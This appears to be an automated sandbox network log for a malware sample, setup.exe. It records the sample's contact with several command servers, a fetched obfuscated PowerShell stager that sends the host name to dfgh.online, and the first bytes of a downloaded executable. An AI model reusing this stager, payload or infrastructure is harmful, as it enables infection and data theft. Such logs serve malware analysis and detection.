                                                                                                                                                                                                                                2024-12-30 18:10:25 UTC15331OUTData Raw: 41 8c e4 b3 99 df 83 7b 40 33 a5 3f 35 db 50 ef 06 20 b5 56 c8 fc cf db 7a 08 48 82 79 2c 98 70 a8 ff 60 f4 66 88 b7 d3 a9 b8 d5 bb 99 af d2 e0 c6 90 21 c0 43 d5 c6 2a 03 b3 93 e8 2b 77 71 d2 e1 08 cc 5b ac c8 7b 01 01 8f 92 cd d4 d3 c1 c9 2f f9 ff df b3 5e ef 4e ad cb 80 2e 21 d6 1d ae b2 3c 5d cc 33 e5 fa 86 a2 29 c4 e5 5d 27 ce 2f 69 31 73 d3 1e 1c 40 5e 98 72 fd 5b 43 44 82 8f b3 16 71 48 f2 31 4a e5 5c e9 dd 5b d5 af 7f 0b a3 b8 a8 37 6d f5 04 ce 96 d9 fd 58 85 62 37 9e b1 07 a7 f8 b1 ff 04 b2 87 2b 12 81 06 cf dc 69 23 4b 5c 48 65 6f 69 f5 6d 8a dc e5 60 5d 74 fc e4 0c e6 cb 13 27 19 de bd 03 56 f9 d6 48 94 cb ae 1e 25 cc b8 07 de 98 50 c2 29 39 69 4d 5c af df a1 28 9f b3 47 81 6f f9 cb 37 ad 4b 13 ce 4a 75 33 73 1d c7 50 21 5b 0e f7 1c a9 0a 6f 2a
                                                                                                                                                                                                                                Data Ascii: A{@3?5P VzHy,p`f!C*+wq[{/^N.!<]3)]'/i1s@^r[CDqH1J\[7mXb7+i#K\Heoim`]t'VH%P)9iM\(Go7KJu3sP![o*
                                                                                                                                                                                                                                2024-12-30 18:10:25 UTC15331OUTData Raw: ba 2e fb ea 32 d5 59 6b e7 84 12 d4 53 df ee 7f 8e 02 6d 1f 5e 4a c9 5e e5 d1 07 9f e0 83 2d 14 69 58 1d bc 10 4a cc 31 cb 3e 7d cc 51 b6 5d 8c b3 75 32 43 22 b1 39 81 cf 5e f3 46 7f bd ac 44 63 3b 31 54 6b 92 fd 5e 64 e2 74 c5 91 3f a6 7c fe f6 2c 5b c9 fe ab a9 be eb e6 ff d2 2e 86 12 ae 35 b0 d5 3a 87 c5 b4 f3 38 2b 5b 04 1a 4c ce 8b 57 b9 59 c1 53 c6 66 7e 8b 73 f5 41 28 06 0e fa f4 4a 6c a8 99 1c bc 92 f1 69 08 bf 6f 03 b1 32 18 1c 35 2c 63 dd 43 17 14 2a 45 ad bc 6e 95 aa 97 cd 2b 5a 7b c3 5a 2c 70 8b c5 be 75 69 2e e1 61 67 2f de a3 a0 61 43 a3 44 1d 2a ae a9 6a 0a 23 43 ed 10 5b 08 e3 9b 25 28 88 7b 4b 34 75 d4 8a a8 63 e6 c3 69 11 8c be 48 00 e4 49 e7 d7 51 9a a0 a5 d8 4b 7a f4 68 1f a3 7d 95 4f 84 1a 11 a8 9a 9f d1 b9 1e 88 db 13 b6 19 65 30 23
                                                                                                                                                                                                                                Data Ascii: .2YkSm^J^-iXJ1>}Q]u2C"9^FDc;1Tk^dt?|,[.5:8+[LWYSf~sA(Jlio25,cC*En+Z{Z,pui.ag/aCD*j#C[%({K4uciHIQKzh}Oe0#
                                                                                                                                                                                                                                2024-12-30 18:10:25 UTC15331OUTData Raw: be b6 52 18 0e 28 2c f0 9e d1 1e 0c 8f 60 b2 30 f5 51 4d 7f 94 3f ee e5 18 2b 18 b5 07 d0 8a 6f fe 18 7a d1 80 5c 40 fe 14 27 c0 26 d9 95 83 ae a3 bc 3f c1 e4 c9 19 f3 c3 f3 de 42 3e c7 29 56 41 06 48 3b 35 a6 bc d0 36 d0 da a9 a5 48 27 b8 42 43 c9 9a 4c 10 9a 84 ce 42 93 a2 05 90 eb af 9f da 66 7c 8e c5 14 ec 90 4d 23 70 68 22 83 8a 6e 8f 27 b4 d0 b7 03 06 c6 5c a4 4b 95 e2 9d fe fe be 2e f4 bd 42 79 dd 4f 69 35 c0 ee 2a ea 58 a5 32 44 72 05 3f c4 ae 8e 72 75 94 b3 39 d0 2a 58 2a 89 b7 27 d4 9c a1 1a 22 e4 d0 af 84 12 45 c9 d3 27 81 4d 5e 66 3e b5 64 3d 2f 8a ad c3 4b e0 f0 5f 4b 54 21 2b 7c b7 99 df 7f 6a f0 81 92 35 f7 a7 da 24 ca e5 54 4e 41 74 9e 21 0f 2b 22 86 8e ff 12 aa 27 ea 0e 91 58 14 74 a3 21 3d 7e 1b b5 26 00 5a f2 d7 0f 08 8d 46 4a cc 0e 2a
                                                                                                                                                                                                                                Data Ascii: R(,`0QM?+oz\@'&?B>)VAH;56H'BCLBf|M#ph"n'\K.ByOi5*X2Dr?ru9*X*'"E'M^f>d=/K_KT!+|j5$TNAt!+"'Xt!=~&ZFJ*
                                                                                                                                                                                                                                2024-12-30 18:10:25 UTC15331OUTData Raw: dd 8f 51 df 8a 13 c8 66 08 e6 f3 bf 13 0f 4d 51 f6 c9 20 c8 fd 6e 99 bc b9 6a d7 be 71 2f ee 4b 9f 01 2e 25 a5 74 28 21 a5 b4 d6 92 f9 17 af ed 93 1c af ed 7b f9 b4 42 63 88 8b 35 7d a6 40 10 95 3c 7f ee 23 ef 5d 45 43 48 3b 6f 96 a7 12 ba d2 e5 f5 29 26 21 b8 6f e3 46 af e2 47 d6 a4 43 ef 73 21 2f 5f ad 63 46 4d ef 38 6d 5c 41 ec 0b 09 82 0f 94 fa c5 9d e9 24 21 86 43 00 53 0e 9a 4e df cf 8e e3 78 fa 0a 85 ee 6f b4 64 96 f5 6e a7 97 f8 f6 a0 61 af f5 93 fa 9e e7 4b 7b df 51 e6 ee f6 e8 bb bc ef 59 5c ad f0 7b 6a 3a 57 51 7c 94 62 56 e9 e1 38 af f0 b1 1f 49 86 99 1f 07 2e 4c 34 ed 2f be b9 df c3 df 2b d7 69 a2 fd 73 79 67 78 e5 47 0e 6a 53 0e 53 7c 0d 12 9b df 68 75 ff e0 03 ac ef 60 b2 a9 e9 cd ff ba 8b 8a 44 c0 92 12 bf 6e e8 da ec 17 07 24 47 ef 77 7b
                                                                                                                                                                                                                                Data Ascii: QfMQ njq/K.%t(!{Bc5}@<#]ECH;o)&!oFGCs!/_cFM8m\A$!CSNxodnaK{QY\{j:WQ|bV8I.L4/+isygxGjSS|hu`Dn$Gw{
                                                                                                                                                                                                                                2024-12-30 18:10:27 UTC1139INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:27 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=gq6b9gl2knn8mkmtj5urhu0nfn; expires=Fri, 25 Apr 2025 11:57:06 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QfeAsm6jgRSlfBD9GtIjxoKqjn4sMYtO61kiOAGzn5UDoM6cCu1rc2xA88StcP5RRkSiaqzpb6Q%2BePv%2B7Y6%2FA7MasOeVwMde8skk%2BvuGbk7Ai9ChTQ41mn4BjfFLEP69oeTPyQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8fa3fc90097772b9-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1820&min_rtt=1817&rtt_var=687&sent=325&recv=601&lost=0&retrans=0&sent_bytes=2841&recv_bytes=587948&delivery_rate=1586094&cwnd=214&unsent_bytes=0&cid=3e77b40f80d4aa2f&ts=1748&x=0"


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                8192.168.2.449744104.21.32.14437252C:\Users\user\Desktop\setup.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-30 18:10:28 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 113
                                                                                                                                                                                                                                Host: learningypr.click
                                                                                                                                                                                                                                2024-12-30 18:10:28 UTC113OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 44 52 4f 4e 26 6a 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 26 68 77 69 64 3d 37 32 45 45 44 32 31 46 44 45 34 30 41 35 38 44 38 35 38 35 41 42 34 34 34 38 33 35 36 33 45 39
                                                                                                                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--DRON&j=637b55279021aab33278188cfa638397&hwid=72EED21FDE40A58D8585AB44483563E9
                                                                                                                                                                                                                                2024-12-30 18:10:29 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:29 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=lqd4dar39ii92da606c3o3jfb7; expires=Fri, 25 Apr 2025 11:57:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o6X7Yn8Yf8dxSZvLdLsbLPd7cmHR%2BKPB9S0QGL%2FFhoOA5311RYrLnVMIv8nFfJbIbGBJVjyXkbTSslRyy49zPRlXTA5AKfljsai91rAMRhoiZzmZ8IFRvQ%2B4wXn7mosv2cVDsA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8fa3fca1795841a6-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1636&rtt_var=618&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1015&delivery_rate=1784841&cwnd=239&unsent_bytes=0&cid=e30f75e56869ea1c&ts=485&x=0"
                                                                                                                                                                                                                                2024-12-30 18:10:29 UTC218INData Raw: 64 34 0d 0a 41 6d 43 76 68 4e 35 46 74 4e 73 6a 4b 6c 30 33 63 78 50 30 37 6d 6d 7a 61 4e 31 5a 72 71 42 59 46 4b 2b 55 67 44 54 39 41 5a 31 5a 47 34 33 78 2f 48 2b 57 73 31 64 65 4c 55 52 4a 54 39 75 79 52 74 41 4e 75 69 79 41 30 7a 42 37 33 38 69 76 44 4d 67 32 71 54 42 57 6e 62 44 71 63 2b 6a 30 55 30 4a 7a 51 77 74 6e 31 73 4a 4c 31 52 7a 2f 59 35 79 4d 65 6e 47 4e 72 72 46 4a 30 58 71 2f 64 30 4b 56 70 72 59 78 77 4b 74 51 45 41 45 59 4c 7a 79 66 67 67 44 44 48 71 67 30 78 39 4d 74 66 59 48 6e 36 46 75 4e 58 62 4a 72 44 74 76 62 76 53 6e 45 68 46 42 43 50 42 6b 48 61 34 44 4d 52 5a 45 4f 71 58 75 55 6b 48 51 32 79 72 61 36 42 49 42 63 0d 0a
                                                                                                                                                                                                                                Data Ascii: d4AmCvhN5FtNsjKl03cxP07mmzaN1ZrqBYFK+UgDT9AZ1ZG43x/H+Ws1deLURJT9uyRtANuiyA0zB738ivDMg2qTBWnbDqc+j0U0JzQwtn1sJL1Rz/Y5yMenGNrrFJ0Xq/d0KVprYxwKtQEAEYLzyfggDDHqg0x9MtfYHn6FuNXbJrDtvbvSnEhFBCPBkHa4DMRZEOqXuUkHQ2yra6BIBc
                                                                                                                                                                                                                                2024-12-30 18:10:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                9192.168.2.449745185.161.251.214437252C:\Users\user\Desktop\setup.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-30 18:10:29 UTC201OUTGET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: cegu.shop
                                                                                                                                                                                                                                2024-12-30 18:10:30 UTC249INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.26.2
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:30 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                Content-Length: 329
                                                                                                                                                                                                                                Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                ETag: "676c9e2a-149"
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                2024-12-30 18:10:30 UTC329INData Raw: 5b 4e 65 74 2e 73 65 72 76 69 63 65 70 4f 49 4e 54 6d 41 4e 61 47 65 72 5d 3a 3a 53 45 63 55 52 69 54 79 50 72 4f 74 6f 43 4f 6c 20 3d 20 5b 4e 65 74 2e 53 65 63 55 72 69 54 79 70 72 4f 74 6f 63 6f 6c 74 59 50 65 5d 3a 3a 74 4c 73 31 32 3b 20 24 67 44 3d 27 68 74 74 70 73 3a 2f 2f 64 66 67 68 2e 6f 6e 6c 69 6e 65 2f 69 6e 76 6f 6b 65 72 2e 70 68 70 3f 63 6f 6d 70 4e 61 6d 65 3d 27 2b 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 3b 20 24 70 54 53 72 20 3d 20 69 57 72 20 2d 75 52 69 20 24 67 44 20 2d 75 53 65 62 41 53 49 63 70 41 52 73 69 4e 67 20 2d 55 73 45 72 41 47 65 6e 74 20 27 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 37 2e
                                                                                                                                                                                                                                Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                10192.168.2.449746172.67.208.584437252C:\Users\user\Desktop\setup.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-30 18:10:30 UTC206OUTGET /int_clp_sha.txt HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Host: klipvumisui.shop
                                                                                                                                                                                                                                2024-12-30 18:10:31 UTC899INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:10:30 GMT
                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                Content-Length: 8767044
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                ETag: "51f99eddd33cc04fb0f55f873b76d907"
                                                                                                                                                                                                                                Last-Modified: Sat, 28 Dec 2024 20:49:42 GMT
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xp7c0WXkbMZDSjy9Ndj28QN6tZoAow9O8wNU7%2B7xGIN9ZzTFUqXBv0ZpypEjd8c%2Fej5CyOoxnT2fRIUNxaZE88zLnhbknYoBLJ4QYPRoxetqQFblvDxilEgnpY6XscSFnQGv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8fa3fcae3b610cae-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1563&rtt_var=629&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2867&recv_bytes=820&delivery_rate=1868202&cwnd=252&unsent_bytes=0&cid=8b4f34e6a6187cd2&ts=333&x=0"
                                                                                                                                                                                                                                2024-12-30 18:10:31 UTC470INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                                                                                                2024-12-30 18:10:31 UTC1369INData Raw: 00 00 d4 52 0b 00 5c 02 00 00 00 60 0b 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 56 0a 00 00 10 00 00 00 58 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 64 1b 00 00 00 70 0a 00 00 1c 00 00 00 5c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 38 38 00 00 00 90 0a 00 00 3a 00 00 00 78 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 58 72 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 0f 00 00 00 50 0b 00 00 10 00 00 00 b2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 a4 01 00 00 00 60 0b 00 00 02 00 00 00
                                                                                                                                                                                                                                Data Ascii: R\`.textVX `.itextdp\ `.data88:x@.bssXr.idataP@.didata`
                                                                                                                                                                                                                                2024-12-30 18:10:31 UTC1369INData Raw: 52 45 53 55 4c 54 04 00 00 00 80 ff ff ff 7f 02 00 44 13 40 00 0e 05 54 47 55 49 44 10 00 00 00 00 00 00 00 00 04 00 00 00 e4 10 40 00 00 00 00 00 02 02 44 31 02 00 cc 10 40 00 04 00 00 00 02 02 44 32 02 00 cc 10 40 00 06 00 00 00 02 02 44 33 02 00 00 00 00 00 08 00 00 00 02 02 44 34 02 00 02 00 06 00 0b 40 76 40 00 0c 26 6f 70 5f 45 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 0b 28 9c 4a 00 0e 26 6f 70 5f 49 6e 65 71 75 61 6c 69 74 79 00 00 00 10 40 00 02 12 40 13 40 00 04 4c 65 66 74 02 00 12 40 13 40 00 05 52 69 67 68 74 02 00 02 00 09 28 9c 4a 00 05 45 6d 70 74 79 00 00 40 13 40 00 00 02 00 09 28 9c 4a 00 06 43 72 65 61 74 65 00 00 40 13 40 00 02 02 00 00 00 00 04 44 61 74
                                                                                                                                                                                                                                Data Ascii: RESULTD@TGUID@D1@D2@D3D4@v@&op_Equality@@@Left@@Right(J&op_Inequality@@@Left@@Right(JEmpty@@(JCreate@@Dat
                                                                                                                                                                                                                                2024-12-30 18:10:31 UTC1369INData Raw: 72 1f 40 00 4d 00 ff ff 00 00 07 54 4f 62 6a 65 63 74 26 00 b8 7d 40 00 06 43 72 65 61 74 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 24 00 e8 7d 40 00 04 46 72 65 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 44 69 73 70 6f 73 65 4f 66 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 3e 00 f4 7d 40 00 0c 49 6e 69 74 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 02 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 00 11 40 00 01 00 08 49 6e 73 74 61 6e 63 65 02 00 02 00 2f 00 94 7e 40 00 0f 43 6c 65 61 6e 75 70 49 6e 73 74 61 6e 63 65 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 29 00 28 9c 4a 00 09 43 6c 61 73 73 54
                                                                                                                                                                                                                                Data Ascii: r@MTObject&}@Create@Self$}@Free@Self)(JDisposeOf@Self>}@InitInstance@Self@Instance/~@CleanupInstance@Self)(JClassT
                                                                                                                                                                                                                                2024-12-30 18:10:31 UTC1369INData Raw: 01 02 00 02 00 5b 00 e8 80 40 00 11 53 61 66 65 43 61 6c 6c 45 78 63 65 70 74 69 6f 6e 03 00 28 13 40 00 08 00 03 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 08 9c 1f 40 00 01 00 0c 45 78 63 65 70 74 4f 62 6a 65 63 74 02 00 00 00 11 40 00 02 00 0a 45 78 63 65 70 74 41 64 64 72 02 00 02 00 31 00 08 81 40 00 11 41 66 74 65 72 43 6f 6e 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 0c 81 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 02 00 39 00 10 81 40 00 08 44 69 73 70 61 74 63 68 03 00 00 00 00 00 08 00 02 08 9c 1f 40 00 00 00 04 53 65 6c 66 02 00 01 00 00 00 00 01 00 07 4d 65 73 73 61 67 65 02 00 02 00 3f 00 04 81
                                                                                                                                                                                                                                Data Ascii: [@SafeCallException(@@Self@ExceptObject@ExceptAddr1@AfterConstruction@Self1@BeforeDestruction@Self9@Dispatch@SelfMessage?
                                                                                                                                                                                                                                2024-12-30 18:10:31 UTC1369INData Raw: 40 00 02 00 05 41 46 6c 61 67 02 00 02 b8 12 40 00 08 00 05 41 44 61 74 61 02 00 02 00 00 5c 23 40 00 07 0f 48 50 50 47 45 4e 41 74 74 72 69 62 75 74 65 b8 22 40 00 34 20 40 00 00 00 06 53 79 73 74 65 6d 00 00 00 00 02 00 00 00 00 00 8c 23 40 00 14 08 50 4d 6f 6e 69 74 6f 72 8c 24 40 00 02 00 a0 23 40 00 14 17 54 4d 6f 6e 69 74 6f 72 2e 50 57 61 69 74 69 6e 67 54 68 72 65 61 64 c0 23 40 00 02 00 00 c4 23 40 00 0e 17 54 4d 6f 6e 69 74 6f 72 2e 54 57 61 69 74 69 6e 67 54 68 72 65 61 64 0c 00 00 00 00 00 00 00 00 03 00 00 00 9c 23 40 00 00 00 00 00 02 04 4e 65 78 74 02 00 e4 10 40 00 04 00 00 00 02 06 54 68 72 65 61 64 02 00 00 11 40 00 08 00 00 00 02 09 57 61 69 74 45 76 65 6e 74 02 00 02 00 00 00 00 00 00 2c 24 40 00 0e 12 54 4d 6f 6e 69 74 6f 72 2e 54 53
                                                                                                                                                                                                                                Data Ascii: @AFlag@AData\#@HPPGENAttribute"@4 @System#@PMonitor$@#@TMonitor.PWaitingThread#@#@TMonitor.TWaitingThread#@Next@Thread@WaitEvent,$@TMonitor.TS
                                                                                                                                                                                                                                2024-12-30 18:10:31 UTC1369INData Raw: 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 31 00 ec f1 40 00 11 42 65 66 6f 72 65 44 65 73 74 72 75 63 74 69 6f 6e 03 00 00 00 00 00 08 00 01 08 10 29 40 00 00 00 04 53 65 6c 66 02 00 02 00 2b 00 00 f2 40 00 0b 4e 65 77 49 6e 73 74 61 6e 63 65 03 00 9c 1f 40 00 08 00 01 00 00 00 00 00 00 00 04 53 65 6c 66 02 00 02 00 14 29 40 00 07 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 2c 28 40 00 9c 1f 40 00 00 00 06 53 79 73 74 65 6d 00 00 01 00 02 47 29 40 00 02 00 02 00 00 00 9c 10 40 00 d4 f1 40 00 00 00 00 00 01 00 00 00 00 00 00 80 00 00 00 80 ff ff 08 52 65 66 43 6f 75 6e 74 00 00 cc 83 44 24 04 fc e9 21 c9 00 00 83 44 24 04 fc e9 3f c9 00 00 83 44 24 04 fc e9 41 c9 00 00 cc 6d 29 40 00 77 29
                                                                                                                                                                                                                                Data Ascii: truction)@Self1@BeforeDestruction)@Self+@NewInstance@Self)@TInterfacedObject,(@@SystemG)@@@RefCountD$!D$?D$Am)@w)
                                                                                                                                                                                                                                2024-12-30 18:10:31 UTC1369INData Raw: 56 42 6f 6f 6c 65 61 6e 02 00 00 11 40 00 08 00 00 00 02 08 56 55 6e 6b 6e 6f 77 6e 02 00 64 10 40 00 08 00 00 00 02 09 56 53 68 6f 72 74 49 6e 74 02 00 b4 10 40 00 08 00 00 00 02 05 56 42 79 74 65 02 00 cc 10 40 00 08 00 00 00 02 05 56 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 09 56 4c 6f 6e 67 57 6f 72 64 02 00 e4 10 40 00 08 00 00 00 02 07 56 55 49 6e 74 33 32 02 00 14 11 40 00 08 00 00 00 02 06 56 49 6e 74 36 34 02 00 34 11 40 00 08 00 00 00 02 07 56 55 49 6e 74 36 34 02 00 00 11 40 00 08 00 00 00 02 07 56 53 74 72 69 6e 67 02 00 00 11 40 00 08 00 00 00 02 04 56 41 6e 79 02 00 d4 2b 40 00 08 00 00 00 02 06 56 41 72 72 61 79 02 00 00 11 40 00 08 00 00 00 02 08 56 50 6f 69 6e 74 65 72 02 00 00 11 40 00 08 00 00 00 02 08 56 55 53 74 72 69 6e 67 02 00
                                                                                                                                                                                                                                Data Ascii: VBoolean@VUnknownd@VShortInt@VByte@VWord@VLongWord@VUInt32@VInt644@VUInt64@VString@VAny+@VArray@VPointer@VUString
